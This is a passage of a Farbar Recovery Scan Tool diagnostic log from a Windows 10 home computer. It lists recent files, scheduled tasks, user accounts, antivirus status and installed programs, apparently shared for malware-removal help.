2020-04-17 18:04 - 2020-04-17 18:04 - 017790464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 003708928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 002131456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcDesktopMonSvc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 002126144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 002114560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001960448 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001942528 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001762816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001719808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wpc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001413704 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001263856 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 001127424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcRefreshTask.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 001071616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BTAGService.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000879616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Service.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000722072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000637240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000589384 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000437560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000416016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcApi.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000297272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000268288 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3svc.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winnat.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000193848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpo.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000151352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\scmbus.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000129024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcDecoderHost.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000103936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3msm.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3api.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000089912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000088352 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilot.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudNotifications.exe
2020-04-17 18:04 - 2020-04-17 18:04 - 000059192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\audioresourceregistrar.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiredNetworkCSP.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcProxyStubs.dll
2020-04-17 18:04 - 2020-04-17 18:04 - 000030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\KNetPwrDepBroker.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\flpydisk.sys
2020-04-17 18:04 - 2020-04-17 18:04 - 000018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sfloppy.sys
2020-04-17 17:38 - 2020-04-17 17:39 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2020-04-17 17:38 - 2020-04-17 17:39 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-04-17 17:14 - 2020-04-17 17:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2020-04-15 17:16 - 2020-04-02 16:20 - 000337592 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-04-14 10:27 - 2020-04-14 10:27 - 000290816 _____ C:\Users\JLO Squared\Desktop\Easter Cards.pub
2020-04-14 04:19 - 2020-04-14 04:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2020-04-14 04:19 - 2020-04-14 04:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2020-04-14 04:19 - 2020-04-14 04:19 - 000047600 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2020-04-14 04:19 - 2020-04-14 04:19 - 000044552 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2020-04-10 08:01 - 2020-04-10 08:01 - 000005556 _____ C:\Users\JLO Squared\Downloads\Louwerse Mar Statement.pdf
2020-04-08 08:54 - 2020-04-08 08:54 - 000000000 ___HD C:\$AV_AVG
2020-04-07 18:13 - 2020-04-07 18:13 - 000001773 _____ C:\Users\JLO Squared\Desktop\Internet Explorer.lnk
2020-04-02 16:22 - 2020-04-02 16:21 - 000235768 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-04-02 16:22 - 2020-04-02 16:21 - 000175984 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-04-02 16:11 - 2020-04-29 11:39 - 000000000 ____D C:\Program Files (x86)\Dropbox
2020-04-02 16:11 - 2020-04-18 00:17 - 000000932 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job
2020-04-02 16:11 - 2020-04-18 00:17 - 000000928 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job
2020-04-02 16:11 - 2020-04-16 13:15 - 000003446 _____ C:\WINDOWS\system32\Tasks\DropboxUpdateTaskMachineUA
2020-04-02 16:11 - 2020-04-16 13:15 - 000003222 _____ C:\WINDOWS\system32\Tasks\DropboxUpdateTaskMachineCore
2020-04-02 16:11 - 2020-04-02 16:11 - 000000000 ____D C:\ProgramData\Dropbox
2020-04-02 16:10 - 2020-04-02 16:10 - 000001823 _____ C:\Users\Public\Desktop\iTunes.lnk
2020-04-02 16:10 - 2020-04-02 16:10 - 000001823 _____ C:\ProgramData\Desktop\iTunes.lnk
2020-04-02 16:10 - 2020-04-02 16:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2020-04-02 16:10 - 2020-04-02 16:10 - 000000000 ____D C:\Program Files\iTunes
2020-04-02 16:10 - 2020-04-02 16:10 - 000000000 ____D C:\Program Files\iPod
2020-04-02 16:08 - 2020-04-02 16:08 - 000000000 ____D C:\WINDOWS\system32\Tasks\Apple
2020-04-02 16:08 - 2020-04-02 16:08 - 000000000 ____D C:\Program Files (x86)\Apple Software Update
2020-04-02 15:44 - 2020-04-02 15:45 - 000000000 ____D C:\Users\JLO Squared\Desktop\Pending Reimb
2020-04-02 15:43 - 2020-04-02 15:47 - 000000000 ____D C:\Users\JLO Squared\Desktop\Learn Photography
2020-04-02 15:41 - 2020-04-02 16:01 - 000000000 ____D C:\Users\JLO Squared\Desktop\Library
2020-04-02 15:41 - 2020-04-02 16:01 - 000000000 ____D C:\Users\JLO Squared\Desktop\Home Life Management Lists

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-29 12:11 - 2016-10-21 08:56 - 000000000 ____D C:\Users\JLO Squared\AppData\Roaming\TeamViewer
2020-04-29 12:07 - 2019-03-18 20:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-04-29 12:06 - 2019-08-21 22:14 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-04-29 12:06 - 2019-03-18 20:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-04-29 12:06 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-04-29 12:05 - 2019-03-18 20:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-04-29 12:04 - 2020-03-03 17:04 - 000000000 ____D C:\Program Files (x86)\SAntivirus
2020-04-29 12:04 - 2017-08-12 13:03 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2020-04-29 12:04 - 2016-04-03 09:48 - 000000000 __SHD C:\Users\JLO Squared\IntelGraphicsProfiles
2020-04-29 11:56 - 2016-02-13 05:20 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-04-29 11:30 - 2019-08-21 21:46 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-04-27 16:17 - 2019-08-21 22:14 - 000003590 _____ C:\WINDOWS\system32\Tasks\JLO Squared DBAgent 2 0
2020-04-26 03:10 - 2016-06-22 23:29 - 000002268 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-23 02:27 - 2020-03-03 17:14 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-04-18 11:49 - 2019-08-21 22:14 - 000003372 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3444092895-3226993445-944412456-1001
2020-04-18 11:44 - 2020-03-03 17:05 - 000000000 ____D C:\ProgramData\AVG
2020-04-18 00:25 - 2019-08-21 22:01 - 000936852 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-04-18 00:23 - 2019-03-18 20:52 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-04-18 00:18 - 2019-03-18 20:50 - 000000000 ____D C:\WINDOWS\INF
2020-04-18 00:17 - 2019-12-02 08:14 - 000000370 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJLO Squared.job
2020-04-18 00:17 - 2019-08-21 21:46 - 000476240 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-04-18 00:15 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-04-18 00:15 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-04-18 00:15 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-04-18 00:14 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-04-18 00:14 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-04-18 00:14 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-04-17 23:59 - 2019-08-21 22:14 - 000004160 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{460E0171-AD0B-4E0B-B9E3-D9A7C24DD923}
2020-04-17 18:28 - 2013-08-22 05:25 - 000000199 _____ C:\WINDOWS\win.ini
2020-04-17 18:12 - 2019-03-18 20:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-04-17 18:11 - 2020-03-23 13:02 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\chromium
2020-04-16 13:15 - 2020-03-09 11:15 - 000002818 _____ C:\WINDOWS\system32\Tasks\HPCeeScheduleForJLO Squared
2020-04-16 13:15 - 2020-03-03 20:37 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVAST Software
2020-04-16 13:15 - 2020-03-03 17:05 - 000003368 _____ C:\WINDOWS\system32\Tasks\ChromiumUpdateTaskMachineUA
2020-04-16 13:15 - 2020-03-03 17:05 - 000003144 _____ C:\WINDOWS\system32\Tasks\ChromiumUpdateTaskMachineCore
2020-04-16 13:15 - 2019-08-21 22:14 - 000003482 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-04-16 13:15 - 2019-08-21 22:14 - 000003348 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-04-16 13:15 - 2019-08-21 22:14 - 000003124 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-04-16 13:15 - 2019-08-21 22:14 - 000003042 _____ C:\WINDOWS\system32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473
2020-04-16 13:15 - 2019-08-21 22:14 - 000003006 _____ C:\WINDOWS\system32\Tasks\JLO Squared1
2020-04-16 13:15 - 2019-08-21 22:14 - 000002800 _____ C:\WINDOWS\system32\Tasks\Seagate_Install_Launch
2020-04-16 13:15 - 2019-08-21 22:14 - 000002680 _____ C:\WINDOWS\system32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon
2020-04-16 13:15 - 2019-08-21 22:14 - 000002638 _____ C:\WINDOWS\system32\Tasks\HPCustParticipation HP ENVY 7640 series
2020-04-16 13:15 - 2019-08-21 22:14 - 000002364 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon
2020-04-16 13:15 - 2019-08-21 22:14 - 000002226 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare)
2020-04-16 13:15 - 2019-08-21 22:14 - 000002204 _____ C:\WINDOWS\system32\Tasks\DropboxOEM
2020-04-16 13:15 - 2019-08-21 22:14 - 000002138 _____ C:\WINDOWS\system32\Tasks\Start SimplePass
2020-04-16 13:15 - 2019-08-21 22:14 - 000002076 _____ C:\WINDOWS\system32\Tasks\Start OPBHOBrokerDesktop
2020-04-16 13:15 - 2019-08-21 22:14 - 000002064 _____ C:\WINDOWS\system32\Tasks\Start OPBHOBroker
2020-04-16 10:21 - 2020-03-03 17:13 - 000459992 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-04-16 00:33 - 2020-03-03 17:19 - 000002006 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-04-16 00:33 - 2020-03-03 17:19 - 000001994 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-04-16 00:33 - 2020-03-03 17:19 - 000001994 _____ C:\ProgramData\Desktop\AVG AntiVirus FREE.lnk
2020-04-16 00:09 - 2020-03-24 08:11 - 000002401 _____ C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams.lnk
2020-04-16 00:09 - 2020-03-24 08:11 - 000002393 _____ C:\Users\JLO Squared\Desktop\Microsoft Teams.lnk
2020-04-15 17:16 - 2019-03-18 20:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-04-15 12:51 - 2020-03-22 14:22 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\CrashDumps
2020-04-13 05:05 - 2019-03-18 20:52 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-04-11 03:20 - 2019-08-21 03:31 - 000002388 _____ C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-04-11 03:20 - 2016-05-14 14:18 - 000000000 ___RD C:\Users\JLO Squared\OneDrive
2020-04-10 08:12 - 2017-12-04 18:40 - 000000000 ____D C:\Users\JLO Squared\Desktop\Josh's Files
2020-04-08 16:33 - 2018-03-02 13:26 - 000000000 ____D C:\Users\JLO Squared\Desktop\Addresses
2020-04-08 08:54 - 2016-07-30 11:49 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\Spotify
2020-04-08 06:18 - 2016-07-30 11:48 - 000000000 ____D C:\Users\JLO Squared\AppData\Roaming\Spotify
2020-04-03 15:32 - 2017-12-15 11:51 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\Packages
2020-04-02 21:37 - 2018-12-12 11:55 - 000000000 ____D C:\Users\JLO Squared\Desktop\Jessica's Files
2020-04-02 21:30 - 2020-03-10 09:45 - 000000000 ____D C:\Users\JLO Squared\Desktop\Parachutes - Personal Archive
2020-04-02 20:26 - 2015-06-17 18:29 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-04-02 20:26 - 2015-06-17 18:29 - 000000000 ____D C:\Program Files (x86)\WildTangent Games
2020-04-02 20:25 - 2019-09-19 14:00 - 000000000 ____D C:\Users\JLO Squared\AppData\Roaming\WildTangent
2020-04-02 20:25 - 2015-06-17 18:29 - 000000000 ____D C:\ProgramData\WildTangent
2020-04-02 20:21 - 2019-04-03 15:46 - 000000000 ____D C:\Program Files (x86)\Wondershare
2020-04-02 16:21 - 2020-03-03 17:13 - 000317864 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-04-02 16:21 - 2020-03-03 17:13 - 000110064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-04-02 16:21 - 2020-03-03 17:13 - 000085664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000852392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000206672 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000043568 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000037960 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-04-02 16:19 - 2020-03-03 17:13 - 000234840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-04-02 16:19 - 2020-03-03 17:13 - 000179032 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-04-02 16:19 - 2020-03-03 17:13 - 000061272 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-04-02 16:16 - 2020-03-22 15:28 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\Dropbox
2020-04-02 16:09 - 2017-01-28 21:38 - 000000000 ____D C:\Program Files\Common Files\Apple
2020-04-02 16:08 - 2017-01-28 21:39 - 000002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2020-04-02 16:02 - 2016-10-31 09:38 - 000000000 ___RD C:\Users\JLO Squared\Desktop\Scanned Documents
2020-04-02 15:57 - 2018-12-12 11:55 - 000000000 ____D C:\Users\JLO Squared\Desktop\Picture Files
2020-04-02 15:55 - 2020-03-03 17:12 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\WinZip
2020-04-02 13:39 - 2020-03-21 12:22 - 000000000 ____D C:\Users\JLO Squared\Documents\CyberLink

==================== Files in the root of some directories ========

2016-10-20 10:29 - 2017-03-05 17:21 - 000043580 _____ () C:\Users\JLO Squared\AppData\Local\digikamrc
2016-10-20 20:38 - 2016-10-22 07:48 - 000000024 _____ () C:\Users\JLO Squared\AppData\Local\digikam_tagsmanagerrc
2016-10-20 19:28 - 2016-10-20 19:28 - 000000050 _____ () C:\Users\JLO Squared\AppData\Local\kdeglobals
2016-10-20 10:31 - 2016-10-20 11:44 - 000002020 _____ () C:\Users\JLO Squared\AppData\Local\showfotorc

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-04-2020
Ran by JLO Squared (29-04-2020 12:17:24)
Running from C:\Users\JLO Squared\Desktop\New folder
Windows 10 Home Version 1903 18362.778 (X64) (2019-08-22 06:15:52)
Boot Mode: Safe Mode (with Networking)
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3444092895-3226993445-944412456-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3444092895-3226993445-944412456-503 - Limited - Disabled)
Guest (S-1-5-21-3444092895-3226993445-944412456-501 - Limited - Disabled)
JLO Squared (S-1-5-21-3444092895-3226993445-944412456-1001 - Administrator - Enabled) => C:\Users\JLO Squared
WDAGUtilityAccount (S-1-5-21-3444092895-3226993445-944412456-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 19.00 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1900-000001000000}) (Version: 19.00.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 20.006.20042 - Adobe Systems Incorporated)
Affinity Photo (HKLM\...\{08F71220-F1A7-405D-8FB8-829E608BC52A}) (Version: 1.5.0.45 - Serif (Europe) Ltd)
Apple Application Support (32-bit) (HKLM-x32\...\{A7039CC9-4669-4799-92B1-C5CE346DBE3D}) (Version: 8.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{7EAC8A42-9FAC-4F6B-AABF-C08C9F2E0F13}) (Version: 5.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6E93B248-22B6-48B2-A568-2E49C65B2EA4}) (Version: 13.5.0.20 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.2.3116 - AVG Technologies)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BookWright version 1.1.130 (HKLM-x32\...\{C17978EB-5A2C-40E3-B351-F03A27245BF9}_is1) (Version: 1.1.130 - Blurb, Inc.)
Chromium (HKLM-x32\...\{C85A209A-98DA-F11A-295A-819AF9DA521A}) (Version: - )
Chromium (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Chromium) (Version: 63.0.3235.0 - Chromium)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.9.5017 - CyberLink Corp.)
Cyberlink PhotoDirector (HKLM\...\{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.4.6121 - CyberLink Corp.) Hidden
Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.4.6121 - CyberLink Corp.)
CyberLink Power Media Player 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.6.4928 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.9.5103 - CyberLink Corp.)
CyberLink PowerBackup 2.6 (HKLM-x32\...\InstallShield_{ADD5DB49-72CF-11D8-9D75-000129760D75}) (Version: 2.6.2.1307 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM\...\{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.3.3812 - CyberLink Corp.) Hidden
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.3.3812 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 95.4.441 - Dropbox, Inc.)
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.3.0 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.295.1 - Dropbox, Inc.) Hidden
Evernote v. 6.24.2 (HKLM-x32\...\{A8B80634-6257-11EA-8C8E-005056951CAD}) (Version: 6.24.2.8919 - Evernote Corp.)
Foxit PhantomPDF (HKLM-x32\...\{4E32271C-B55A-4CDF-8DB7-88FD1C45927C}) (Version: 7.0.310.226 - Foxit Software Inc.)
GnuWin32: Make-3.81 (HKLM-x32\...\Make-3.81_is1) (Version: 3.81 - GnuWin32)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 81.0.4044.122 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.99.0 - Google Inc.) Hidden
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{4BF17F05-B2DA-4266-8AEB-09BC9D008EAF}) (Version: 1.3.0.0 - Hewlett-Packard)
HP Dropbox Plugin (HKLM-x32\...\{D12BC084-97D6-438A-AA7C-5962608D17A0}) (Version: 36.0.41.58587 - HP)
HP ENVY 7640 series Basic Device Software (HKLM\...\{B81E425D-39FF-4846-B4BB-7AD61909A0EF}) (Version: 40.11.1135.17143 - HP Inc.)
HP ENVY 7640 series Help (HKLM-x32\...\{5845A5C9-AA03-4D91-9793-1A2563CE0129}) (Version: 34.0.0 - Hewlett Packard)
HP ESU for Microsoft Windows 8.1 (HKLM-x32\...\{CF3BE446-3D26-49D3-B202-C9A13511DEEC}) (Version: 1.6.1 - Hewlett-Packard Company)
HP Google Drive Plugin (HKLM-x32\...\{BFA42100-DB54-467A-BB87-CF70732B4065}) (Version: 36.0.41.58587 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP)
